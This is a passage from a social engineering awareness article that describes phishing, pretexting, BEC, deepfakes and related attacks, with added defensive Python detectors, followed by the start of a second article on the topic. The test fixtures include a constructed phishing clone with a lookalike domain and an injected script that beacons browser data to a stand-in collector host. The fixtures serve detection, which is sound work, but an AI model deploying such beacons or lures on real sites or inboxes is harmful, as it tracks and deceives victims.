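LINK_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def normalize(domain):
    """Undo common look-alike substitutions (rn for m, 0 for o, ...)."""
    d = domain.lower()
    for bad, good in CONFUSABLES:
        d = d.replace(bad, good)
    return d


def registered_domain(host):
    """Last two labels of a host (toy rule; use the public suffix list in production)."""
    parts = (host or "").lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else parts[0]


def lookalike_domain(domain):
    """Return the trusted domain that `domain` imitates, or None."""
    domain = domain.lower()
    if not domain or domain in TRUSTED_DOMAINS:
        return None
    norm = normalize(domain)
    for trusted in sorted(TRUSTED_DOMAINS, key=len, reverse=True):
        label = normalize(trusted.rsplit(".", 1)[0])  # e.g. "example-bank"
        if norm == normalize(trusted) or norm.startswith((label + "-", label + ".")):
            return trusted
    return None


def address_domain(header_value):
    m = re.search(r"@([A-Za-z0-9.-]+)", str(header_value or ""))
    return registered_domain(m.group(1)) if m else ""


def link_hosts(msg):
    """(registered host of href, host the visible text claims or '') per anchor."""
    part = msg.get_body(preferencelist=("html", "plain"))
    pairs = []
    for href, text in LINK_RE.findall(part.get_content() if part else ""):
        text = re.sub(r"<[^>]+>", "", text).strip()
        claimed = ""
        if " " not in text and "." in text:   # the visible text itself looks like a URL
            claimed = registered_domain(urlparse(text if "://" in text else "http://" + text).hostname)
        pairs.append((registered_domain(urlparse(href).hostname), claimed))
    return pairs


def analyze(raw, known_good=None):
    """Return human-readable findings for one RFC 5322 message (empty list = clean)."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    from_dom, reply_dom = address_domain(msg["From"]), address_domain(msg["Reply-To"])
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from sender domain {from_dom}")
    if lookalike_domain(from_dom):
        findings.append(f"sender domain {from_dom} looks like {lookalike_domain(from_dom)}")
    links = link_hosts(msg)
    for host, claimed in links:
        if claimed and claimed != host:
            findings.append(f"link text shows {claimed} but points to {host}")
        if lookalike_domain(host):
            findings.append(f"link host {host} looks like {lookalike_domain(host)}")
    if known_good is not None:   # clone check against the earlier legitimate message
        good = email.message_from_string(known_good, policy=policy.default)
        new_hosts = {h for h, _ in links} - {h for h, _ in link_hosts(good)}
        if msg["Subject"] == good["Subject"] and new_hosts:
            findings.append(f"clone of '{msg['Subject']}': links now go to {sorted(new_hosts)}")
    return findings


# Constructed messages: a legitimate invoice notice and a clone of it.
LEGIT = """\
From: billing@example-bank.com
Subject: Invoice 1042 is ready
Content-Type: text/html

<p>View it at <a href="https://portal.example-bank.com/inv/1042">portal.example-bank.com</a></p>
"""
CLONE = """\
From: billing@exarnple-bank.com
Reply-To: billing@mail-secure-login.net
Subject: Invoice 1042 is ready
Content-Type: text/html

<p>Updated link: <a href="https://portal.example-bank.com.mail-secure-login.net/inv/1042">portal.example-bank.com</a></p>
"""

if __name__ == "__main__":
    for finding in analyze(CLONE, known_good=LEGIT):
        print("-", finding)
```

Run against the constructed clone, `analyze` reports four findings: the Reply-To mismatch, the `rn`-for-`m` sender lookalike, link text claiming `example-bank.com` while the href lands on `mail-secure-login.net`, and the changed link host relative to the earlier message. The two-label `registered_domain` rule is deliberately simple; a real deployment should use the public suffix list so that `example.co.uk`-style domains are handled correctly.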

If you successfully spot a phishing email, it can be tempting to respond to the scam attempt and tell them off — but this isn’t a good idea. For one, replying to a phishing email verifies that your email address is active, which can make you a high priority for follow-up attacks, or for your email address to be sold to other attackers. Your reply can also give cybercriminals access to additional information such as location data or your company’s email signature, which can include phone numbers, addresses, and other information they can use to create more convincing phishing campaigns — or potentially snare your co-workers or LinkedIn contacts.

3. Pretexting

Pretexting involves an attacker creating a fabricated scenario to obtain information from a target. They often impersonate someone in a position of authority or someone with a legitimate reason for needing the information.

The attacker builds a story that convinces the victim to divulge sensitive information or perform an action that compromises security.

Pretexting as a tactic is used in a variety of social engineering attacks, particularly phishing, whaling, and business email compromise. But cybercriminals can also use pretexting on its own to steal valuable information from their victims.


In 2016, a hacker gained access to data for thousands of employees at the Justice Department and Department of Homeland Security, including email addresses and phone numbers, by impersonating a government employee. They later published the information online.

In 2017, MacEwan University sent nearly $9 million to someone posing as a contractor with a construction company working on a new building project. A supporting letter attached to the email appeared to have been signed by the actual construction company’s chief financial officer, and the university wired the money to the bank account specified in the email. The scam wasn’t discovered until the real construction company reached out to inquire about the outstanding balance. 

The school eventually recovered more than 90% of the lost funds , but only after lengthy legal proceedings and a lot of media attention. They’ve since instituted new processes and security awareness training for all employees.

Last year, the FBI warned healthcare organizations against schemes to extort money or steal personally identifiable information (PII) using pretexting. Scammers spoof authentic phone numbers or use fake credentials to masquerade as agency officials. They then notify targets that they were subpoenaed to provide expert witness testimony in a criminal or civil case, failed to appear, and have been held in contempt of court and issued a fine. Failure to pay the fine would result in an arrest warrant, with scammers using aggressive tactics to pressure targets into paying immediately via wire transfer, cash by mail, or cryptocurrency. 

4. Baiting

Baiting is similar to phishing but involves the promise of a specific item that the attacker uses as bait. This could be free software, gift cards, movie or music downloads, or anything else that seems appealing to the target. The attacker uses this bait to entice the victim into downloading malicious software or revealing login credentials.

USB drops are a classic example of baiting. The US Department of Homeland Security once ran a test on government employees to see how easy it would be for hackers to install malware or gain access to computer systems. USB drives were dropped in parking lots of government agencies and private contractors — and 60% of the people who picked them up plugged them into their devices. If the drive had an official logo on it, 90% were plugged in.

5. Quid pro quo

With quid pro quo attacks, threat actors prey on the law of psychological reciprocity — when someone helps us out, we want to return the favor. 

Often, quid pro quo attacks happen when cybercriminals pose as IT or tech support. They may offer to install anti-virus software or resolve an issue with a computer system in exchange for sensitive information like login credentials. Once they gain access, they install malware or steal other sensitive data. 

In one case, a threat actor impersonated Apple tech support to trick celebrities, musicians, and professional athletes into revealing sensitive information. Posing as Apple tech support, the cybercriminal asked victims for usernames and passwords or the answers to security questions. With this information, they could access the victim’s full Apple profile, including payment card and billing details. They could then change passwords, contact emails, and security questions. The scammer spent thousands of dollars on personal expenses charged to his victims’ accounts. 

6. Business email compromise & CEO fraud

Business Email Compromise (BEC) is when an attacker gains access to a corporate email account and impersonates the owner to defraud the company or its employees, customers, or partners. They usually focus on employees who have access to company finances and trick them into conducting money transfers to bank accounts thought to be trusted.

CEO fraud is a specific type of BEC scam where attackers impersonate a CEO or another high-ranking managerial official. The attacker leverages the authority of the CEO to pressure an employee into conducting unauthorized transactions or sending sensitive data.


Snapchat fell victim to a BEC scheme in 2016 when scammers impersonated CEO Evan Spiegel. The company’s payroll department responded to an email appearing to come from Spiegel with sensitive payroll data — while the company didn’t publicly disclose exactly what information was shared, it could have included salary details, social security numbers, bank accounts, addresses, emails, and other personally identifiable information on its current and former employees.

7. Deepfaking

Deepfaking involves using AI technologies to create realistic images, videos, or audio to manipulate or deceive. Attackers can create audio and video that looks authentic, showing individuals saying or doing things they did not actually say or do.

In early 2020, the AI-created voice of a bank director was used to trick a bank manager into transferring millions of dollars to threat actors. The manager received a phone call from someone who sounded exactly like the director of his parent company, informing him that the company was about to make an acquisition. The manager was instructed to authorize a $35 million transfer, and there were even emails in the manager’s inbox from the director and a lawyer confirming where the money needed to be transferred. Believing the instructions to be legitimate, the manager initiated the transfer.

Investigators in the UAE believe the elaborate scheme involved at least 17 individuals, with the stolen money sent to multiple bank accounts all over the globe. 

As the cost to produce convincing deepfakes decreases, the FBI and Department of Homeland Security predict deepfake threats will become increasingly difficult to identify and protect against. As legislation is beginning to address the threats of deepfake videos, cybersecurity measures, such as detection algorithms, are being created to combat the threat. 

8. Tailgating

Tailgating, also known as piggybacking, involves an unauthorized person physically following an authorized person into a restricted area.

The attacker may strike up a conversation or carry something to manipulate the authorized person into holding the door open for them.

While tailgating and piggybacking attacks typically refer to unauthorized physical access, in one interesting case a tech worker admitted to piggybacking off a hacker’s extortion attempt . 

A UK company was hit by a ransomware attack in February 2018, during which the attacker demanded a $370,000 bitcoin payment. A member of the company’s incident response team saw an opportunity to launch a secondary attack — by altering the original ransomware email to swap out the cryptocurrency wallet address provided by the original attacker with his own. The employee also spoofed the attacker’s email address and began emailing the organization to pressure them into paying the ransom. He was later caught when authorities successfully tracked his IP address. 

9. Spear phishing & whaling

Spear Phishing is a more targeted form of phishing. The attacker customizes their deceptive messages to a specific individual or organization.

The emails appear more legitimate and are often meticulously crafted to appeal to the victim.


In 2014, attackers attributed to North Korea launched a spear-phishing attack against Sony Pictures in an effort to halt the release of the film The Interview . The attack resulted in the leak of sensitive data, including unreleased films.

In 2016, the US Democratic Party famously fell victim to a spear phishing attack that exposed sensitive information about the Clinton presidential campaign. Hackers sent a fake email that prompted recipients to change their passwords due to unusual activity, then used the harvested credentials to access sensitive information.

Whaling targets high-profile individuals, such as executives, celebrities, or politicians. The tactics are similar to spear-phishing but on a grander scale.

In 2008, a widespread whaling scheme snared as many as 2,000 corporate executives with a series of emails masquerading as official subpoenas. The email correctly addressed CEOs and other top executives by their full names and included details such as phone numbers, company names, and titles. Recipients were instructed to click on a link to a detailed copy of the subpoena and were then directed to install a browser add-on to read the document. Accepting the add-on actually installed a backdoor and keylogging software, allowing the scammers to steal credentials and other sensitive information. 

10. Smishing & vishing

Smishing (SMS phishing) uses text messages, while Vishing (voice phishing) uses phone calls to scam the victim. These attacks are designed to steal sensitive data or money by posing as a legitimate entity.


In July 2020, Twitter famously suffered a hack in which 130 high-profile accounts were targeted, among them politicians like Barack Obama and Joe Biden, celebrities and entrepreneurs like Bill Gates and Elon Musk, and global brands like Apple. 

Hackers downloaded users’ Twitter data, accessed DMs, and published tweets promising to double donations to a bitcoin wallet. Within minutes, the scammers had received over $100,000 in bitcoin from hundreds of transactions. 

Twitter explained the incident was the result of a vishing (phone spear phishing) attack in which Twitter employees were tricked into handing over credentials for internal support tools; with that access the scammers took over the targeted accounts. Twitter’s share price plunged 7% in pre-market trading the following day. 

11. Watering hole attacks

In a watering hole attack, the attacker identifies a website or resource their target group frequently uses and infects it with malware to compromise members of the group. For example, if the target group is in the financial sector, the attacker might infect a popular financial news website.

In February 2021, an intruder remotely accessed the control system of a water treatment facility in Oldsmar, Florida, and changed a setting that drastically raised the amount of sodium hydroxide (lye) in the water. Luckily, an astute operator caught the manipulation as it was happening and restored the level to its normal range with no damage done. 

An investigation that followed found that malicious code had been placed on an infrastructure contractor’s website, and that a computer on the water treatment plant’s network visited that site on the day of the intrusion. The code functioned as a fingerprinting script, collecting details about the website’s visitors including operating system, CPU, browser plugins, input methods, camera presence, accelerometer, microphone, time zone, and location. It contained no exploit code, however, and the investigators did not establish that the watering hole delivered the intruder’s access: the intruder used remote access software (TeamViewer) that was already installed on a plant computer connected to the control system. The episode still illustrates the pattern to watch for: a compromised supplier site profiling the industrial visitors it attracts, ahead of a targeted follow-up.
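A supplier whose site is used as a watering hole usually learns about it from the victim, long after the fact. The cheap preventive check is to keep an inventory of every script a page serves and diff later copies of the page against it. The following is an added example written for this page, not code from the article or from any investigation: it records the external script URLs and the SHA-256 of each inline script from a known-clean copy, then reports scripts served from hosts outside an allowlist, new external URLs, and inline scripts whose hash is unknown. The page HTML, host names, and the injected fingerprinting loader are constructed for the example.

```python
"""Added example: detect scripts injected into a page you operate, the footprint
a watering-hole compromise leaves on a supplier's site. All HTML and host names
below are constructed for the example."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and SHA-256 digests of inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline script, else None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            self._buf = None
            if body:
                self.inline.append(hashlib.sha256(body.encode()).hexdigest())


def script_inventory(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return {"external": parser.external, "inline": parser.inline}


def find_injected_scripts(html, baseline, allowed_hosts):
    """Diff a page against its baseline inventory.

    Returns (kind, detail) tuples: 'unknown-host' for an external script served
    from a host outside the allowlist, 'new-external' for an allowed host but a
    URL the baseline never had, 'new-inline' for an inline script whose hash
    the baseline does not contain. Same-origin relative paths have no host.
    """
    inventory = script_inventory(html)
    findings = []
    for src in inventory["external"]:
        host = (urlparse(src).hostname or "").lower()
        if host and host not in allowed_hosts:
            findings.append(("unknown-host", src))
        elif src not in baseline["external"]:
            findings.append(("new-external", src))
    for digest in inventory["inline"]:
        if digest not in baseline["inline"]:
            findings.append(("new-inline", digest[:16]))
    return findings


# Constructed pages: the contractor's clean page, then the same page with a
# fingerprinting loader injected before </head>.
CLEAN_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.contractor.example/lib/jquery.min.js"></script>
<script>window.siteConfig = {"region": "fl"};</script>
</head><body><h1>Water systems contractor</h1></body></html>"""

INFECTED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="//stats.collector.example.net/fp.js"></script>\n'
    "<script>var fp={ua:navigator.userAgent,tz:Intl.DateTimeFormat().resolvedOptions().timeZone};"
    'new Image().src="//stats.collector.example.net/c?"+btoa(JSON.stringify(fp));</script>\n'
    "</head>",
)

ALLOWED_HOSTS = {"cdn.contractor.example"}
BASELINE = script_inventory(CLEAN_PAGE)

if __name__ == "__main__":
    for kind, detail in find_injected_scripts(INFECTED_PAGE, BASELINE, ALLOWED_HOSTS):
        print(kind, detail)
```

The clean page diffs clean against its own baseline; the infected copy yields an `unknown-host` finding for the protocol-relative loader and a `new-inline` finding for the collector snippet. The same inventory is a natural seed for a Content-Security-Policy `script-src` allowlist, which turns the detection into prevention in the visitor's browser.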


12. Scareware

Scareware tricks individuals into thinking their computer is infected with malware, urging them to install software that is actually malware itself. This is often encountered as pop-up advertisements or warnings while browsing the web.

In one famous example, the "Antivirus XP" scareware tricked users into paying for fake antivirus software by aggressively advertising security alerts on users' computers.

In 2019, Office Depot and Support.com agreed to pay a $35 million settlement after they were accused of using scareware tactics to deceive customers into purchasing unnecessary support and repair services. From 2008-2016, Office Depot and OfficeMax offered customers a free “PC Health Check” to scan devices for malware and performance problems. According to the FTC, the real purpose of the health check was to sell diagnostic and repair services that customers didn’t actually need. 

The PC checkup program was programmed to report that repairs were necessary if the customer answered “yes” to any one of four questions asked, including whether customers were seeing frequent pop-up ads on their device. Suggested repair services could cost upwards of $300. While Office Depot never admitted any wrongdoing, they agreed to the settlement, which the FTC says was used to refund customers. 

13. Ransomware

Ransomware is a type of malicious software, or malware, that encrypts a victim's files. The attacker then demands a ransom to restore access to the data, typically by showing the victim instructions for paying a fee, usually in bitcoin, in exchange for the decryption key. Demands can range from a few hundred dollars to thousands.


In April 2021, employees of Merseyrail, a UK rail operator, received an email from their boss’s email account with the subject line “Lockbit Ransomware Attack and Data Theft.” Journalists from national newspapers and tech news outlets were also copied on the emails. 

The email explained that the company had been hacked and offered an image of an employee’s personal data as proof. The Lockbit scammers demanded a ransom to release the compromised data. Not only did the scammers steal sensitive data, they also put public pressure on the company to pay the ransom quickly. This tactic is often used to force organizations to rush into a payment, bypassing security protocols like informing relevant authorities and following established procedures.  

15 best practices to protect your organization against social engineering attacks

To protect against social engineering attacks, organizations and IT teams should adopt a multi-layered approach that combines technology, processes, and human-centered initiatives. Here are some best practices to follow:

  • Educate and train employees: Technical safeguards like firewalls and spam filters can only do so much. Human error is one of the most pervasive vulnerabilities facing modern organizations – and one of the most difficult to remediate. Regularly conduct security awareness training to educate employees about different forms of social engineering attacks — at least annually, if not quarterly. Use real-life examples and simulations to make them aware of the tactics used by attackers.
  • Create clear security policies: Develop and enforce clear security policies regarding the handling of sensitive information. Make sure employees know whom to contact if they receive suspicious communications.
  • Use multi-factor authentication (MFA): Implement MFA for accessing sensitive systems. This ensures that even if login credentials are compromised, an additional layer of security is present.
  • Regularly update and patch systems: Keep all systems, software, and anti-virus programs up-to-date to reduce vulnerabilities that can be exploited.
  • Implement email filtering solutions: Use email filtering solutions to detect and prevent phishing emails from reaching users’ inboxes.
  • Use a least privilege model: Grant employees the minimum levels of access necessary for their job functions. This limits the potential damage in case of a compromise.
  • Maintain activity and access logs: Regularly monitor and log access to sensitive data. This can help quickly identify anomalous behavior and respond to a potential breach.
  • Encourage employees to report suspicious activity: Create a culture where employees feel comfortable reporting any suspicious activity or communication without fear of repercussions.
  • Secure physical access : Implement security measures such as access cards, biometrics, and visitor logs to prevent unauthorized physical access to facilities (tailgating).
  • Conduct regular internal security audits: Conduct regular security assessments, including penetration testing and social engineering drills, to evaluate the effectiveness of your security controls.
  • Implement data encryption: Encrypt sensitive data both in transit and at rest. This ensures that even if data is intercepted, it remains secure.
  • Create an incident response plan: Have a well-documented incident response plan in place. This ensures that in case of an attack, your organization can respond effectively to mitigate damage.
  • Use contact verification: For any unusual requests involving the transfer of funds or sensitive data, establish a policy to verify the request through an alternative communication channel.
  • Adhere to legal and compliance requirements: Ensure that your security practices are in alignment with legal and compliance requirements. This may include adherence to standards like GDPR , HIPAA , or PCI DSS .
  • Strive for Continual Improvement: The threat landscape is always evolving, so it's crucial to regularly reassess and update policies, controls, and training programs.

Remember that humans are often the weakest link in security. A well-rounded approach that educates employees, implements strong technical controls, and establishes clear policies is key to defending against social engineering tactics.


Arm your team against social engineering attacks with Secureframe Training

Cybersecurity is not simply a technical issue; it's first and foremost a human issue. Even the most advanced security system can be compromised by a simple human error. 

It’s crucial for employees to stay updated on the latest scams, threats, and attack techniques. Regular training equips teams with the knowledge they need to recognize and respond appropriately to a variety of cyber threats. Employees who understand the potential consequences of poor cyber hygiene are far less likely to fall victim to attacks and are more likely to take preventative measures seriously.

What’s more, security regulations and standards such as SOC 2 ,® ISO 27001 , HIPAA , GDPR , and PCI DSS require regular security awareness training. These standards recognize that protecting sensitive data requires an informed and vigilant workforce. When employees are equipped with the right knowledge and a security-conscious mindset, they can not only prevent incidents but also effectively respond in case of a security breach.

The Secureframe platform includes proprietary security awareness training, making it easy to assign, track, and report on required employee training. Our engaging training programs are kept up-to-date, so the latest best practices are learned and applied throughout your organization. You can also segment your workforce and assign just the training required for each group or role.

Learn more about Secureframe Training , or schedule a demo with a product expert. 

What is the most popular form of social engineering attacks?

Phishing is the most popular form of social engineering, according to multiple sources. In 2022, phishing schemes were the number one crime type reported to the FBI's Internet Crime Complaint Center . In 2023, phishing was the top reason in confirmed breaches and made up 44% of social engineering incidents in Verizon's 2023 Data Breach Investigations Report .

What is a real life example of a social engineering attack?

The recent cyber attack on the prominent casino chain MGM Resorts reported on September 11, 2023 is a real life example of a social engineering attack. It appears that hackers impersonated an employee whose information they found on LinkedIn during a call to MGM’s IT help desk to obtain credentials to access and infect the systems. This was confirmed by a cybersecurity executive familiar with the investigation in a Bloomberg report .
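A help-desk reset of this kind leaves a recognisable trail in identity-provider logs, which is what the "maintain activity and access logs" best practice earlier on this page is for. The following is an added example, not code from the article or from the MGM investigation: it correlates, per user, a password reset performed by support, a newly enrolled MFA factor, and a login from a country absent from that user's earlier logins, all inside a one-hour window, and raises one alert per such chain. The event names, field names, and the JSON-lines events are constructed for the example; a real deployment would map them from the identity provider's own schema.

```python
"""Added example: correlate identity events to catch the help-desk takeover
pattern (support reset -> new MFA factor -> login from a new country). The
events below are constructed JSON lines, not real logs; field names are assumed."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)

EVENTS = """\
{"ts": "2023-09-01T10:00:00", "user": "asmith", "event": "login", "country": "US"}
{"ts": "2023-09-08T08:05:00", "user": "jdoe", "event": "login", "country": "US"}
{"ts": "2023-09-09T09:00:00", "user": "jdoe", "event": "login", "country": "US"}
{"ts": "2023-09-10T14:02:00", "user": "jdoe", "event": "helpdesk_password_reset", "actor": "support-agent-7"}
{"ts": "2023-09-10T14:10:00", "user": "jdoe", "event": "mfa_factor_enrolled", "factor": "sms"}
{"ts": "2023-09-10T14:15:00", "user": "jdoe", "event": "login", "country": "BR"}
{"ts": "2023-09-10T15:00:00", "user": "asmith", "event": "helpdesk_password_reset", "actor": "support-agent-2"}
{"ts": "2023-09-10T15:30:00", "user": "asmith", "event": "login", "country": "US"}
"""


def parse_events(text):
    """JSON lines -> event dicts with a datetime `ts`, sorted by time."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    for event in events:
        event["ts"] = datetime.fromisoformat(event["ts"])
    return sorted(events, key=lambda e: e["ts"])


def detect_helpdesk_takeovers(events, window=WINDOW):
    """One alert per help-desk reset followed, within `window`, by both a new MFA
    factor and a login from a country unseen in the user's earlier logins.
    A reset followed only by a login from a familiar country is not alerted."""
    by_user = defaultdict(list)
    for event in events:
        by_user[event["user"]].append(event)
    alerts = []
    for user, user_events in by_user.items():
        seen_countries = set()  # countries of logins that happened before the reset
        for i, event in enumerate(user_events):
            if event["event"] == "helpdesk_password_reset":
                after = [x for x in user_events[i + 1:] if x["ts"] - event["ts"] <= window]
                new_factor = any(x["event"] == "mfa_factor_enrolled" for x in after)
                odd_logins = [x for x in after
                              if x["event"] == "login" and x["country"] not in seen_countries]
                if new_factor and odd_logins:
                    alerts.append({
                        "user": user,
                        "reset_at": event["ts"].isoformat(),
                        "reset_by": event.get("actor"),
                        "login_from": odd_logins[0]["country"],
                        "login_at": odd_logins[0]["ts"].isoformat(),
                    })
            elif event["event"] == "login":
                seen_countries.add(event["country"])
    return alerts


if __name__ == "__main__":
    for alert in detect_helpdesk_takeovers(parse_events(EVENTS)):
        print(json.dumps(alert))
```

On the constructed data only `jdoe` is alerted: the reset by `support-agent-7` is followed within the hour by an SMS factor enrolment and a login from a country never seen for that user, whereas `asmith`'s reset is followed by an ordinary login. The alert is a trigger for a callback to the user on a number held on file before the reset, not to a number supplied on the ticket; the design choice of keying "new country" off the user's own history rather than a global list keeps the rule useful for travelling staff.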

What are warning signs of social engineering attacks?

Warning signs of social engineering attacks include:

  • The email, call, voice, or text message is unexpected . For example, say you receive a text message from the CEO of your company. This may be unexpected because they've never contacted you before or they've never used this channel to contact you before. This is a strong indicator of a social engineering attack.
  • The request is out of the ordinary . You may have received a message from the same sender before, but never received this type of request. For example, say you get a request from your manager to send them money, which they've never done before. This is another strong indicator of a social engineering attack.
  • There is an unusual file attachment or URL . Many social engineering schemes involve a potentially dangerous file or URL. Potentially malicious file formats include those that end in EXE, DLL, URL, SCR, HTA, HTM, HTML, MSI, SYS, and ZIP. Potentially malicious URLs may contain lots of percentage symbols, random characters, or the name of another well-known brand.
  • There is a sense of urgency . The request may be normal but conveyed with a heightened sense of urgency. For example, the request may be to enter your login credentials as soon as possible or you'll be locked out of your account. This is another high-risk trait of a social engineering attack. The malicious actor wants to motivate the potential victim with a threat of harm.
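The third warning sign above can be turned into a mechanical check. The following Python is an added example, not code from the original page: it applies the extension list from that bullet, adds the double-extension and right-to-left-override tricks that hide an executable behind a harmless-looking name, and scores URLs for heavy percent-encoding, random-looking labels, raw IP hosts, the userinfo trick, and brand names used outside the brand's own domain. The brand table and the thresholds are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Extensions the warning sign above lists as potentially dangerous.
RISKY_EXTENSIONS = {"exe", "dll", "url", "scr", "hta", "htm", "html", "msi", "sys", "zip"}
# Types an attacker hides a risky one behind, as in "invoice.pdf.exe".
BENIGN_LOOKING = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# Assumed brand table for illustration; a deployment would use its own suppliers and
# the brands its staff see impersonated most.
KNOWN_BRANDS = {"paypal": "paypal.com", "microsoft": "microsoft.com", "apple": "apple.com"}


def attachment_flags(filename):
    """Reasons an attachment name looks suspicious; empty list when none apply."""
    flags = []
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return flags
    ext = parts[-1]
    if ext in RISKY_EXTENSIONS:
        flags.append(f"risky extension .{ext}")
    if len(parts) >= 3 and parts[-2] in BENIGN_LOOKING and ext in RISKY_EXTENSIONS:
        flags.append("double extension hides executable type")
    # U+202E reverses the displayed text, so "photo<U+202E>gnp.exe" renders as "photoexe.png".
    if "\u202e" in filename:
        flags.append("RTL override character in name")
    return flags


def edit_distance(a, b):
    """Levenshtein distance, to catch one-character typosquats such as paypa1.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host):
    """Crude eTLD+1 (last two labels). Fine for .com-style hosts; use the public
    suffix list in production so that co.uk and friends are handled."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def url_flags(url):
    """Reasons a URL looks suspicious; empty list when none apply."""
    flags = []
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if not host:
        return ["no host"]
    # Five or more percent-escapes usually means the path or query is being hidden.
    if len(re.findall(r"%[0-9a-fA-F]{2}", url)) >= 5:
        flags.append("heavy percent-encoding")
    # Long vowel-less labels with digits are typical of throwaway hosts (heuristic,
    # expect some false positives on CDN names).
    for label in host.split("."):
        if len(label) >= 12 and re.search(r"\d", label) and not re.search(r"[aeiou]", label):
            flags.append(f"random-looking label '{label}'")
    reg = registrable_domain(host)
    for brand, real_domain in KNOWN_BRANDS.items():
        if reg == real_domain:
            continue  # the brand's own domain
        if brand in host:
            flags.append(f"brand '{brand}' used outside {real_domain}")
        elif edit_distance(reg.split(".")[0], brand) == 1:
            flags.append(f"lookalike of {real_domain}: {reg}")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        flags.append("IP address instead of hostname")
    # "https://paypal.com@evil.example/" shows the brand but connects to evil.example.
    if parsed.username:
        flags.append("userinfo before host hides the real destination")
    return flags
```

Note what the extension list does not catch: the RSA spreadsheet mentioned later on this page was a plain .xls, so `attachment_flags("2011 recruitment plan.xls")` returns nothing. Extension lists catch the crude cases; office documents with macros or embedded exploits need content inspection.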

SOC 1 ® , SOC 2 ® and SOC 3 ® are registered trademarks of the American Institute of Certified Public Accountants in the United States. The AICPA ® Trust Services Criteria for Security, Availability, Processing Integrity, Confidentiality, and Privacy is copyrighted by the Association of International Certified Professional Accountants. All rights reserved.


Josh Fruhlinger

Social engineering: Definition, examples, and techniques

Social engineering is the art of exploiting human psychology, rather than technical hacking techniques, to gain access to buildings, systems, or data. Train yourself to spot the signs.


What is social engineering?

Social engineering is the art of exploiting human psychology, rather than technical hacking techniques, to gain access to buildings, systems, or data.

For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

Famous hacker Kevin Mitnick helped popularize the term ‘social engineering’ in the ’90s, although the idea and many of the techniques have been around as long as there have been scam artists.

Even if you have all the bells and whistles when it comes to securing your data center, your cloud deployments and your building's physical security, have invested in defensive technologies, have the right security policies and processes in place, and measure their effectiveness and continuously improve, a crafty social engineer can still weasel their way right through (or around).

How does social engineering work?

The phrase “social engineering” encompasses a wide range of behaviors, and what they all have in common is that they exploit certain universal human qualities: greed, curiosity, politeness, deference to authority, and so on. While some classic examples of social engineering take place in the “real world”—a man in a FedEx uniform bluffing his way into an office building, for example—much of our daily social interaction takes place online, and that’s where most social engineering attacks happen as well. For instance, you might not think of phishing or smishing as types of social engineering attacks, but both rely on tricking you—by pretending to be someone you trust or tempting you with something you want—into downloading malware onto your device.

This brings up another important point, which is that social engineering can represent a single step in a larger attack chain. A smishing text uses social dynamics to entice you with a free gift card, but once you tap the link and download malicious code, your attackers will be using their technical skills to gain control of your device and exploit it.

Social engineering examples

A good way to get a sense of what social engineering tactics you should look out for is to know about what’s been used in the past. We’ve got all the details in an extensive article on famous social engineering attacks , but for the moment let’s focus on three social engineering techniques — independent of technological platforms — that have been successful for scammers in a big way.

Offer something sweet. As any con artist will tell you, the easiest way to scam a mark is to exploit their own greed. This is the foundation of the classic Nigerian 419 scam, in which the scammer tries to convince the victim to help get supposedly ill-gotten cash out of their own country into a safe bank, offering a portion of the funds in exchange. These “Nigerian prince” emails have been a running joke for decades, but they’re still an effective social engineering technique that people fall for: in 2007 the treasurer of a sparsely populated Michigan county gave $1.2 million in public funds to such a scammer in the hopes of personally cashing in. Another common lure is the prospect of a new, better job, which apparently is something far too many of us want: in a hugely embarrassing 2011 breach, the security company RSA was compromised when at least two low-level employees opened a malware file attached to a phishing email with the file name “2011 recruitment plan.xls.”

Fake it till you make it. One of the simplest — and surprisingly most successful — social engineering techniques is to simply pretend to be your victim. In one of Kevin Mitnick’s legendary early scams, he got access to Digital Equipment Corporation’s OS development servers simply by calling the company, claiming to be one of their lead developers, and saying he was having trouble logging in; he was immediately rewarded with a new login and password. This all happened in 1979, and you’d think things would’ve improved since then, but you’d be wrong: in 2016, a hacker got control of a U.S. Department of Justice email address and used it to impersonate an employee, coaxing a help desk into handing over an access token for the DoJ intranet by saying it was his first week on the job and he didn’t know how anything worked.

Many organizations do have barriers meant to prevent these kinds of brazen impersonations, but they can often be circumvented fairly easily. When Hewlett-Packard hired private investigators to find out which HP board members were leaking info to the press in 2005, they were able to supply the PIs with the last four digits of their targets’ social security number — which AT&T’s tech support accepted as proof of ID before handing over detailed call logs.

